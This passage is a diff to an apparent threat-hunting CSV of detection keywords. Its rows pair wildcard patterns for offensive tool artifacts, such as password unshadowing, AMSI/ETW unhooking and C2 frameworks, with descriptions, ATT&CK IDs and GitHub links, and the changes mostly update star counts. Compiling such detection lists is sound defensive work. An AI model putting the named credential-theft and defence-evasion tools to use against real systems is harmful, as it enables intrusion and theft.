- T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*UmVmbGVjdGl2ZSBJbmplY3QgUHJvY2VzcyBJZA==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*Un1k0d3r/SCShell*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" -"*uname=FUZZ&pass=FUZZ*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*Unblock-File .\install.ps1*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" -"*Unconstrained_Delegation_Systems.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*uname=FUZZ&pass=FUZZ*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*Unblock-File .\install.ps1*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation 
OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*Unconstrained_Delegation_Systems.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Und3rf10w*","offensive_tool_keyword","Github Username","github repo hosting offensive tools and exploitation frameworks","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Und3rf10w","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*unDefender-master*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "*undertheradar-main*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" -"*unhide-implant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*unhide-implant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*unhook kernel32*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*unhook wldp amsi*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*UnhookingKnownDlls.*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*UnhookingNtdll_disk.*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" -"*UnhookingPatch-main*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","259","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*UnhookingPatch-main*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*UniByAv*","offensive_tool_keyword","UniByAv","UniByAv is a simple obfuscator that take raw shellcode and generate executable that are Anti-Virus friendly. The obfuscation routine is purely writtend in assembly to remain pretty short and efficient. 
In a nutshell the application generate a 32 bits xor key and brute force the key at run time then perform the decryption of the actually shellcode.","T1027 - T1059 - T1029","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/UniByAv","1","1","N/A","N/A","3","239","67","2018-10-26T15:25:26Z","2017-08-15T21:57:15Z" "*unicorn.py *","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" "*unicorn-master.zip*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" "*unixpickle*","offensive_tool_keyword","Github Username","github repo hosting obfuscation tools","N/A","N/A","N/A","N/A","Defense Evasion","https://github.com/unixpickle","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*unkvolism/Fuck-Etw*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*unmanagedPowershell */command*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" 
-"*unmarshal_cmd_exec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*UnmarshalPwn.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*UnmarshalPwn.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*unode/firefox_decrypt*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1622","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z" -"*UnquotedPath.csproj*","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*UnquotedPath.exe*","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*unshackle --*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1482","83","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" 
-"*unshackle-main*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1482","83","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" -"*unshackle-v1.0.iso*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1482","83","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" -"*unshadow /etc/passwd*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*unshadow passwd shadow*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*untested_payloads.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*unmarshal_cmd_exec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*UnmarshalPwn.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*UnmarshalPwn.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*unode/firefox_decrypt*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1624","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z" +"*UnquotedPath.csproj*","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*UnquotedPath.exe*","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*unshackle --*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" 
+"*unshackle-main*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*unshackle-v1.0.iso*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*unshadow /etc/passwd*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*unshadow passwd shadow*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*untested_payloads.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*UnwindInspector.exe*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" -"*Update-ExeFunctions*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*upload-dll * *.dll*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","0","N/A","10","3","228","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*Update-ExeFunctions*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
